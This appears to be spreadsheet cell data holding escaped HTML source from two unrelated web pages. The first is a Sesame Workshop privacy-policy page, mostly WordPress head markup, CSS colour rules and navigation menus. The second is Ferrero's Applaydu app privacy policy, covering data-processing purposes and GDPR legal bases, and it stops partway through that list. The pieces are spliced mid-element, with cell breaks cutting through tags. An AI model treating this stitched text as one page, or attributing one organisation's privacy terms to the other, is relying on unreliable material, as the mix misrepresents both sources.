	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://sesameworkshop.org/about-us/legal/privacy-policy/","url":"https://sesameworkshop.org/about-us/legal/privacy-policy/","name":"Privacy Policy - Sesame Workshop","isPartOf":{"@id":"https://sesameworkshop.org/#website"},"datePublished":"2022-12-13T21:49:32+00:00","dateModified":"2023-03-30T16:21:42+00:00","description":"Sesame Workshop has been trusted by parents for decades to provide safe, entertaining, and educational content.</t>
  </si>
  <si>
    <t>We take this trust seriously and recognize","breadcrumb":{"@id":"https://sesameworkshop.org/about-us/legal/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://sesameworkshop.org/about-us/legal/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://sesameworkshop.org/about-us/legal/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://sesameworkshop.org/"},{"@type":"ListItem","position":2,"name":"About Us","item":"https://sesameworkshop.org/about-us/"},{"@type":"ListItem","position":3,"name":"Legal","item":"https://sesameworkshop.org/about-us/legal/"},{"@type":"ListItem","position":4,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://sesameworkshop.org/#website","url":"https://sesameworkshop.org/","name":"Sesame Workshop","description":"Helping Kids Everywhere Grow Smarter, Stronger, and Kinder. ","publisher":{"@id":"https://sesameworkshop.org/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://sesameworkshop.org/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://sesameworkshop.org/#organization","name":"Sesame Workshop","url":"https://sesameworkshop.org/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://sesameworkshop.org/#/schema/logo/image/","url":"https://test.sesameworkshop.org/wp-content/uploads/2023/01/sw-logo-696x696-1.jpg","contentUrl":"https://test.sesameworkshop.org/wp-content/uploads/2023/01/sw-logo-696x696-1.jpg","width":696,"height":696,"caption":"Sesame Workshop"},"image":{"@id":"https://sesameworkshop.org/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/SesameWorkshop/","https://twitter.com/sesameworkshop","https://instagram.com/sesameworkshop","https://www.tiktok.com/@sesamestreet"]}]}&lt;/script&gt;
&lt;link rel='dns-prefetch' href='//sesameworkshop.org' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='https://sesameworkshop.org/wp/wp-includes/css/dist/block-library/style.min.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;style id='whs-sw-char-stats-style-inline-css' type='text/css'&gt;
&lt;/style&gt;
&lt;link rel='stylesheet' id='magic-login-login-block-css' href='https://sesameworkshop.org/wp-content/plugins/magic-login-pro/dist/css/login-block-style.css?ver=1.8' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css' type='text/css'&gt;
body{--wp--preset--color--black: #151515;--wp--preset--color--cyan-bluish-gray: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#9b51e0;--wp--preset--color--bright-oscar: #00b140;--wp--preset--color--big-bird: #ffd400;--wp--preset--color--light-rosita: #a5e5d9;--wp--preset--color--oscar: #00953b;--wp--preset--color--zoe: #ff5100;--wp--preset--color--elmo: #ea0029;--wp--preset--color--prairie: #ed40a9;--wp--preset--color--count: #c028b9;--wp--preset--color--dark-count: #76236c;--wp--preset--color--grover: #0050b5;--wp--preset--color--cookie: #0082ca;--wp--preset--color--rosita: #00a19b;--wp--preset--color--dark-grey: #3d3d3d;--wp--preset--color--med-grey: #54585a;--wp--preset--color--grey: #a7a8aa;--wp--preset--color--light-grey: #f5f5f5;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: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t>
  </si>
  <si>
    <t>6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px</t>
  </si>
  <si>
    <t>6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}body { margin: 0;--wp--style--global--content-size: 1024px;--wp--style--global--wide-size: 1024px; }.wp-site-blocks &gt; .alignleft { float: left; margin-right: 2em; }.wp-site-blocks &gt; .alignright { float: right; margin-left: 2em; }.wp-site-blocks &gt; .aligncenter { justify-content: center; margin-left: auto; margin-right: auto; }:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float:</t>
  </si>
  <si>
    <t>left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>important;}body .is-layout-constrained &gt; :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex &gt; *{margin: 0;}body{padding-top: 0px;padding-right: 0px;padding-bottom: 0px;padding-left: 0px;}a:where(:not(.wp-element-button)){text-decoration: underline;}.wp-element-button, .wp-block-button__link{background-color: #32373c;border-width: 0;color: #fff;font-family: inherit;font-size: inherit;line-height: inherit;padding: calc(0.667em + 2px) calc(1.333em</t>
  </si>
  <si>
    <t>+ 2px);text-decoration: none;}.has-black-color{color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) ! important;}.has-bright-oscar-color{color: var(--wp--preset--color--bright-oscar) ! important;}.has-big-bird-color{color: var(--wp--preset--color--big-bird) !</t>
  </si>
  <si>
    <t>important;}.has-light-rosita-color{color: var(--wp--preset--color--light-rosita) ! important;}.has-oscar-color{color: var(--wp--preset--color--oscar) ! important;}.has-zoe-color{color: var(--wp--preset--color--zoe) !</t>
  </si>
  <si>
    <t>important;}.has-elmo-color{color: var(--wp--preset--color--elmo) ! important;}.has-prairie-color{color: var(--wp--preset--color--prairie) ! important;}.has-count-color{color: var(--wp--preset--color--count) !</t>
  </si>
  <si>
    <t>important;}.has-dark-count-color{color: var(--wp--preset--color--dark-count) ! important;}.has-grover-color{color: var(--wp--preset--color--grover) ! important;}.has-cookie-color{color: var(--wp--preset--color--cookie) !</t>
  </si>
  <si>
    <t>important;}.has-rosita-color{color: var(--wp--preset--color--rosita) ! important;}.has-dark-grey-color{color: var(--wp--preset--color--dark-grey) ! important;}.has-med-grey-color{color: var(--wp--preset--color--med-grey) !</t>
  </si>
  <si>
    <t>important;}.has-grey-color{color: var(--wp--preset--color--grey) ! important;}.has-light-grey-color{color: var(--wp--preset--color--light-grey) ! important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !</t>
  </si>
  <si>
    <t>important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-background-color{background-color: var(--wp--preset--color--white) ! important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) ! important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) ! important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !</t>
  </si>
  <si>
    <t>important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) ! important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) ! important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) ! important;}.has-bright-oscar-background-color{background-color: var(--wp--preset--color--bright-oscar) !</t>
  </si>
  <si>
    <t>important;}.has-big-bird-background-color{background-color: var(--wp--preset--color--big-bird) ! important;}.has-light-rosita-background-color{background-color: var(--wp--preset--color--light-rosita) ! important;}.has-oscar-background-color{background-color: var(--wp--preset--color--oscar) !</t>
  </si>
  <si>
    <t>important;}.has-zoe-background-color{background-color: var(--wp--preset--color--zoe) ! important;}.has-elmo-background-color{background-color: var(--wp--preset--color--elmo) ! important;}.has-prairie-background-color{background-color: var(--wp--preset--color--prairie) !</t>
  </si>
  <si>
    <t>important;}.has-count-background-color{background-color: var(--wp--preset--color--count) ! important;}.has-dark-count-background-color{background-color: var(--wp--preset--color--dark-count) ! important;}.has-grover-background-color{background-color: var(--wp--preset--color--grover) !</t>
  </si>
  <si>
    <t>important;}.has-cookie-background-color{background-color: var(--wp--preset--color--cookie) ! important;}.has-rosita-background-color{background-color: var(--wp--preset--color--rosita) ! important;}.has-dark-grey-background-color{background-color: var(--wp--preset--color--dark-grey) !</t>
  </si>
  <si>
    <t>important;}.has-med-grey-background-color{background-color: var(--wp--preset--color--med-grey) ! important;}.has-grey-background-color{background-color: var(--wp--preset--color--grey) ! important;}.has-light-grey-background-color{background-color: var(--wp--preset--color--light-grey) !</t>
  </si>
  <si>
    <t>important;}.has-black-border-color{border-color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !</t>
  </si>
  <si>
    <t>important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) ! important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) ! important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) ! important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) ! important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !</t>
  </si>
  <si>
    <t>important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) ! important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !</t>
  </si>
  <si>
    <t>important;}.has-bright-oscar-border-color{border-color: var(--wp--preset--color--bright-oscar) ! important;}.has-big-bird-border-color{border-color: var(--wp--preset--color--big-bird) ! important;}.has-light-rosita-border-color{border-color: var(--wp--preset--color--light-rosita) !</t>
  </si>
  <si>
    <t>important;}.has-oscar-border-color{border-color: var(--wp--preset--color--oscar) ! important;}.has-zoe-border-color{border-color: var(--wp--preset--color--zoe) ! important;}.has-elmo-border-color{border-color: var(--wp--preset--color--elmo) !</t>
  </si>
  <si>
    <t>important;}.has-prairie-border-color{border-color: var(--wp--preset--color--prairie) ! important;}.has-count-border-color{border-color: var(--wp--preset--color--count) ! important;}.has-dark-count-border-color{border-color: var(--wp--preset--color--dark-count) !</t>
  </si>
  <si>
    <t>important;}.has-grover-border-color{border-color: var(--wp--preset--color--grover) ! important;}.has-cookie-border-color{border-color: var(--wp--preset--color--cookie) ! important;}.has-rosita-border-color{border-color: var(--wp--preset--color--rosita) !</t>
  </si>
  <si>
    <t>important;}.has-dark-grey-border-color{border-color: var(--wp--preset--color--dark-grey) ! important;}.has-med-grey-border-color{border-color: var(--wp--preset--color--med-grey) ! important;}.has-grey-border-color{border-color: var(--wp--preset--color--grey) !</t>
  </si>
  <si>
    <t>important;}.has-light-grey-border-color{border-color: var(--wp--preset--color--light-grey) ! important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) ! important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !</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</si>
  <si>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rel='stylesheet' id='theme-stylesheet-css' href='https://sesameworkshop.org/wp-content/themes/sesame-workshop/style.css?ver=2023-04-06T01-11-36-684Z' type='text/css' media='all' /&gt;
&lt;link rel="https://api.w.org/" href="https://sesameworkshop.org/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://sesameworkshop.org/wp-json/wp/v2/pages/73" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://sesameworkshop.org/wp/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://sesameworkshop.org/wp/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.2" /&gt;
&lt;link rel='shortlink' href='https://sesameworkshop.org/?p=73' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://sesameworkshop.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsesameworkshop.org%2Fabout-us%2Flegal%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://sesameworkshop.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsesameworkshop.org%2Fabout-us%2Flegal%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
			&lt;/head&gt;
&lt;body class="page-template page-template-legal page-template-legal-php page page-id-73 page-child parent-pageid-71" data-template="base.twig"&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>Google Tag Manager (noscript) --&gt;
	&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-K9G2KZD"
	height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
	&lt;!-- End Google Tag Manager (noscript) --&gt;
	&lt;a tabindex="0" href="#start-of-content" class="skip-to-content"&gt;Skip to content&lt;/a&gt;
	&lt;header class="page-header"&gt;
&lt;nav class="sw-nav"&gt;
  &lt;div class="sw-nav__main"&gt;
    &lt;div class="sw-nav__logo"&gt;
      &lt;a href="/"&gt;
&lt;img loading="lazy" class="sw-logo" src="https://sesameworkshop.org/wp-content/themes/sesame-workshop/images/logo_full_color.svg" alt="Sesame Workshop" /&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="sw-nav__menu"&gt;
      &lt;div class="sw-nav__menu__bars"&gt;
&lt;i class="sw-icon fa-solid fa-bars" aria-hidden="true"&gt;&lt;/i&gt;
      &lt;/div&gt;
      &lt;ul class="sw-nav__menu__list"&gt;
                  &lt;li&gt;
            &lt;div&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--primary " href="https://sesameworkshop.org/resources/" title="Family Resources"&gt;Family Resources&lt;/a&gt;
              &lt;/div&gt;
            &lt;div class="sw-nav__subnav "&gt;
  &lt;ul&gt;
          &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="https://sesameworkshop.org/abcs-and-123s/" title="ABCs and 123s" target="_self"&gt;
      &lt;span&gt;ABCs and 123s&lt;/span&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
          &lt;/a&gt;
                    &lt;div class="sw-nav__subnav__dropdown" id=""&gt;
            &lt;ul class="sw-nav__subsubnav"&gt;
                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="https://sesameworkshop.org/topics/science-for-kids/" title="Science" target="_self"&gt;Science&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                    &lt;/div&gt;
                    &lt;ul&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/science-for-kids/curiosity/" title="Curiosity" target="_self"&gt;Curiosity&lt;/a&gt;
                        &lt;/li&gt;
                                          &lt;/ul&gt;
                  &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="https://sesameworkshop.org/topics/art/" title="Art" target="_self"&gt;
      &lt;span&gt;Art&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="https://sesameworkshop.org/topics/financial-education/" title="Financial Education" target="_self"&gt;
      &lt;span&gt;Financial Education&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="https://sesameworkshop.org/topics/language-literacy/" title="Language and Literacy" target="_self"&gt;Language and Literacy&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                    &lt;/div&gt;
                    &lt;ul&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/language-literacy/reading/" title="Reading" target="_self"&gt;Reading&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/language-literacy/vocabulary/" title="Vocabulary" target="_self"&gt;Vocabulary&lt;/a&gt;
                        &lt;/li&gt;
                                          &lt;/ul&gt;
                  &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="https://sesameworkshop.org/topics/math/" title="Math" target="_self"&gt;
      &lt;span&gt;Math&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="https://sesameworkshop.org/topics/school-readiness/" title="School Readiness" target="_self"&gt;
      &lt;span&gt;School Readiness&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                          &lt;/ul&gt;
          &lt;/div&gt;
              &lt;/li&gt;
          &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="https://sesameworkshop.org/healthy-minds-and-bodies/" title="Healthy Minds and Bodies" target="_self"&gt;
      &lt;span&gt;Healthy Minds and Bodies&lt;/span&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
          &lt;/a&gt;
                    &lt;div class="sw-nav__subnav__dropdown" id=""&gt;
            &lt;ul class="sw-nav__subsubnav"&gt;
                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="https://sesameworkshop.org/topics/asthma/" title="Asthma" target="_self"&gt;
      &lt;span&gt;Asthma&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="https://sesameworkshop.org/topics/autism/" title="Autism" target="_self"&gt;Autism&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                    &lt;/div&gt;
                    &lt;ul&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/autism/building-flexibility/" title="Building Flexibility" target="_self"&gt;Building Flexibility&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/autism/family-connection/" title="Family Connection" target="_self"&gt;Family Connection&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/autism/how-to-make-friends/" title="How to Make Friends" target="_self"&gt;How to Make Friends&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/autism/talking-about-autism/" title="Talking About Autism" target="_self"&gt;Talking About Autism&lt;/a&gt;
                        &lt;/li&gt;
                                          &lt;/ul&gt;
                  &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="https://sesameworkshop.org/topics/eating-well/" title="Eating Well" target="_self"&gt;
      &lt;span&gt;Eating Well&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="https://sesameworkshop.org/topics/family-bonding/" title="Family Bonding" target="_self"&gt;Family Bonding&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                    &lt;/div&gt;
                    &lt;ul&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/family-bonding/blended-families/" title="Blended Families" target="_self"&gt;Blended Families&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/family-bonding/dads/" title="Dads" target="_self"&gt;Dads&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/family-bonding/grandparents/" title="Grandparents" target="_self"&gt;Grandparents&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="https://sesameworkshop.org/topics/family-bonding/moms/" title="Moms" target="_self"&gt;Moms&lt;/a&gt;
                        &lt;/li&gt;
                                          &lt;/ul&gt;
                  &lt;/li&gt;
                                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="https://sesameworkshop.org/topics/health/" title="Health and Hygiene" target="_self"&gt;Health and Hygiene&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hid</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;title&gt;PRIVACY POLICY&lt;/title&gt;
    &lt;link rel="shortcut icon" type="image/x-icon" href="../../../CSS/favicon.ico"&gt;
    &lt;link href="../../../CSS/style.css" media="all" rel="stylesheet" type="text/css"&gt;
    &lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;
    &lt;meta name="viewport" content="width=device-width, viewport-fit=cover, initial-scale=1, maximum-scale=1, viewport-fit=auto"&gt;
    &lt;style type="text/css"&gt;
         .gl-legal-content {
            padding-left: env(safe-area-inset-left) ;
            padding-right: env(safe-area-inset-right);
        }
        @supports(padding: max(0px))</t>
  </si>
  <si>
    <t>{
            .gl-legal-content {
                padding-left: max(40px, env(safe-area-inset-left));
                padding-right: max(40px, env(safe-area-inset-right));
            }
        }
        .fancybox-margin {
            margin-right: 0px;
        }
    &lt;/style&gt;
    &lt;script&gt;
        window.onload = function () {
            var expandBtn = document.getElementsByClassName("button-expand")[0];
            var expandList = document.getElementsByClassName("list-expand")[0];
            expandBtn.addEventListener("click", function () {
                if (expandList.style.display === "block") {
                    expandList.style.display = "none";
                } else {
                    expandList.style.display = "block";
                }
            });
            var supportLink = document.getElementById("support-link");
            if(supportLink)
            {
                if (window.location.href.match("#ios") || navigator.userAgent.match(/(Mac|iPad|iPhone|iPod)/g))
                     supportLink.href = "https://support.apple.com/en-gb/guide/iphone/iph251e92810/ios";
                else
                    supportLink.href = "https://support.google.com/googleplay/answer/6270602?hl=en";
            }
        }
        console.log('QA version: 0.0.8');
    &lt;/script&gt;
&lt;/head&gt;
&lt;body class="pace-done" data-gr-c-s-loaded="true"&gt;
    &lt;div class="pace  pace-inactive" style="display: none;"&gt;
        &lt;div class="pace-progress" data-progress-text="100%" data-progress="99"
            style="transform: translate3d(100%, 0px, 0px);"&gt;
            &lt;div class="pace-progress-inner"&gt;&lt;/div&gt;
        &lt;/div&gt;
        &lt;div class="pace-activity"&gt;
            &lt;div class="preloader"&gt;
                &lt;div class="spinner"&gt;&lt;span class="s-dot s-dot1"&gt;&lt;/span&gt;&lt;span class="s-dot s-dot2"&gt;&lt;/span&gt;&lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;section id="main-container"&gt;
        &lt;header class="inner"&gt;
            &lt;div class="header-content pad-edge"&gt;
                &lt;div class="auto"&gt;
                    &lt;div class="logo fl"&gt;
                    &lt;a id="header-btn-legal" href="https://www.kinder.com/applaydu" target="_blank"&gt;
                        &lt;img class="black" src="../../../CSS/logo.svg" width="50" height="30" alt="" title=""&gt;
                        &lt;/a&gt;
                    &lt;/div&gt;
                    &lt;div class="clr"&gt;&lt;/div&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/header&gt;
        &lt;section id="main-wrapper"&gt;
            &lt;div class="inner-content" style="padding-top: 71px;"&gt;
                &lt;div class="gl-legal-content pad-edge par"&gt;
                    &lt;div class="auto gl-legal-m-center"&gt;
                        &lt;h2&gt;&lt;strong&gt; Last update: November 2021&lt;/strong&gt;&lt;/h2&gt;
                        &lt;h1&gt;&lt;strong&gt;PRIVACY POLICY&lt;/strong&gt;&lt;/h1&gt;
                        &lt;style type="text/css"&gt;
                            a {
                                text-decoration: underline;
                                color: #00bff9;
                                word-break: unset !important;
                            }
                            table td,
                            table th {
                                border: 1px solid #bababa;
                                padding: 10px;
                            }
                            .text-justify {
                                text-align: justify;
                            }
                        &lt;/style&gt;
                        &lt;p&gt;Ferrero International S.A, ("Ferrero"), has conceived the Applaydu software application ("App") to bring playful learning to children and adults, providing parents with a trustworthy content provider which allows them to establish a complete and direct control over their children amusement experience, thus aiming to engage the whole family network and reinforce the family bonds.</t>
  </si>
  <si>
    <t>To enable you to use our App, we need to process some data that is personal, like, e.g., your e-mail address. By using our service, you agree to be bound by this Privacy Policy, which describes our practices related to the use, storage and disclosure of information we collect from or about you or your children through our App. We take your trust and privacy very seriously and therefore aim to process as little personal data as necessary, committing ourselves to a proper and legitimate processing of the same.</t>
  </si>
  <si>
    <t>"Processing" means using or touching information in any way, including, but not limited to, collecting, storing, deleting, using, combining and disclosing information. Ferrero reserves the right to modify this Privacy Policy at any time and without prior notice. We will post any changes to this Privacy Policy on &lt;a href="https://www.magic-kinder.com/"&gt;www.kinder.com&lt;/a&gt; and update the date shown above, so please check regularly for the most recent version of our Privacy Policy.</t>
  </si>
  <si>
    <t>The privacy policy link within the App will point your device to our most current policy. If we make material changes to this Privacy Policy, we may notify you in a more prominent manner and (where appropriate) seek to obtain your prior consent, or the consent of a parent or legal guardian. This Privacy Policy is not a contract and does not create any legal rights or obligations.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Purpose&lt;/h2&gt;
                        &lt;p&gt;</t>
  </si>
  <si>
    <t>The App processes data for the purpose of:&lt;/p&gt;
                        &lt;p&gt;
                            &lt;text&gt;(i)&lt;/text&gt; &lt;text&gt;operating the service;&lt;/text&gt;&lt;br/&gt;
                            &lt; text&gt;(ii)&lt;/text&gt; &lt;text&gt;sending you e-mail with information about your game progresses and activity;&lt;/text&gt;&lt;br/&gt;
                            &lt;text&gt;(iii)&lt;/text&gt; &lt;text&gt;sending you, with your prior consent, e-mail newsletters for marketing promotions performed by Ferrero and our affiliates;&lt;/text&gt;&lt;br/&gt;
                            &lt;text&gt;(iv)&lt;/text&gt; &lt;text&gt;carrying out research activities;&lt;/text&gt;&lt;br/&gt;
                            &lt;text&gt;(v)&lt;/text&gt; &lt;text&gt;improving the contents of the App (through data analytics and results of research activities); and&lt;/text&gt;&lt;br/&gt;
							&lt;text&gt;(vi)&lt;/text&gt; &lt;text&gt;to follow up on abuse reports and cooperate with law enforcement.&lt;/text&gt;&lt;br/&gt;
                        &lt;/p&gt;
                        &lt;p&gt; We do not sell or otherwise distribute your personal data to third parties and will not send you any commercial proposals unless expressly authorized to do so.</t>
  </si>
  <si>
    <t>Even when you authorize us to send you our proposals, you are free to opt out at any time. To evaluate the use of our service as well as for statistical purposes, only anonymised data shall be used.&lt;/p&gt;
                        &lt;button class="button-expand" type="button"&gt;Expand&lt;/button&gt;
                        &lt;ul class="list-expand" style="display: none;"&gt;
                            &lt;li style="list-style: lower-roman"&gt;When processing data for the purpose of operating the service, we rely on Art. 6(1)(b) GDPR – this means that we need to process your personal data in order to perform a service you have requested from us.&lt;/li&gt;
                            &lt;li style="list-style: lower-roman"&gt;When processing data to send you e-mail with information about game progresses, we also rely on Art.</t>
  </si>
  <si>
    <t>6(1)(b) GDPR – as above, where you ask us to send you these e-mails within the App, we need to process your personal data to provide you with this service. Please note that you can ask us to send you these e-mails through the preferences you set on the App, and that these services are turned off by default.&lt;/li&gt;
                            &lt;li style="list-style: lower-roman"&gt;When processing data to send you e-mail newsletters, we rely on your consent, under Art. 6(1)(a) GDPR.</t>
  </si>
  <si>
    <t>This is expressed by the preferences you set on the App, and for marketing promotions it is turned off by default.&lt;/li&gt;
                            &lt;li style="list-style: lower-roman"&gt;When processing data for the purpose of carrying out research activities, Ferrero typically relies on Art. 6(1)(f) GDPR – in other words, our legitimate interests in carrying out research activities;&lt;/li&gt;
							&lt;li style="list-style: lower-roman"&gt;When processing data for the purpose of improving the service, we rely on your consent, under Art. 6(1)(a) GDPR.</t>
